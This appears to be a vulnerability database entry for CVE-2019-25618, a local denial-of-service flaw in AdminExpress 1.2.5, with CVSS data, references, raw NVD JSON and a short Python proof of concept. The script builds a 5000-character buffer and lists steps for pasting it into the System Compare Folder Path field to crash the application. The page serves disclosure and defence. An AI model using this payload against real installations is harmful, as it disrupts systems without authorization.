CVE-2019-25618

Description

AdminExpress 1.2.5 contains a denial of service vulnerability that allows local attackers to crash the application by submitting oversized input through the System Compare feature. Attackers can paste a large buffer of characters into the Folder Path field and trigger the comparison function to cause the application to become unresponsive or crash.

CVSS Details

CVSS Score

6.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

AdminExpress 1.2.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2019-25618 (AdminExpress Denial of Service)
# This script generates a malicious payload to crash the application.

def generate_dos_payload(length=5000):
    """
    Generates a large string buffer to trigger the crash.
    """
    return "A" * length

if __name__ == "__main__":
    # Generate a payload of 5000 characters
    crash_payload = generate_dos_payload(5000)
    
    print("[+] Payload generated successfully.")
    print(f"[+] Payload length: {len(crash_payload)} characters")
    print("\n[!] Manual Steps to Reproduce:")
    print("1. Launch AdminExpress 1.2.5")
    print("2. Navigate to the 'System Compare' feature")
    print("3. Copy the payload generated below.")
    print("4. Paste the payload into the 'Folder Path' field.")
    print("5. Click the 'Compare' or trigger the function.")
    print("6. Application will become unresponsive or crash.")
    
    # For demonstration purposes, printing first 100 chars
    print(f"\nPayload preview: {crash_payload[:100]}...")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25618
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25618
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25618/
[4] VulDB https://vuldb.com/cve/CVE-2019-25618
[5] https://admin-express.en.softonic.com/
[6] https://www.exploit-db.com/exploits/46711
[7] https://www.vulncheck.com/advisories/adminexpress-denial-of-service-via-system-compare

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25618", "sourceIdentifier": "[email protected]", "published": "2026-03-22T14:16:30.693", "lastModified": "2026-04-16T16:19:50.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "AdminExpress 1.2.5 contains a denial of service vulnerability that allows local attackers to crash the application by submitting oversized input through the System Compare feature. Attackers can paste a large buffer of characters into the Folder Path field and trigger the comparison function to cause the application to become unresponsive or crash."}, {"lang": "es", "value": "AdminExpress 1.2.5 contiene una vulnerabilidad de denegación de servicio que permite a atacantes locales bloquear la aplicación al enviar una entrada de tamaño excesivo a través de la función System Compare. Los atacantes pueden pegar un búfer grande de caracteres en el campo Folder Path y activar la función de comparación para hacer que la aplicación deje de responder o se bloquee."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-73"}]}], "references": [{"url": "https://admin-express.en.softonic.com/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46711", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/adminexpress-denial-of-service-via-system-compare", "source": "[email protected]"}]}}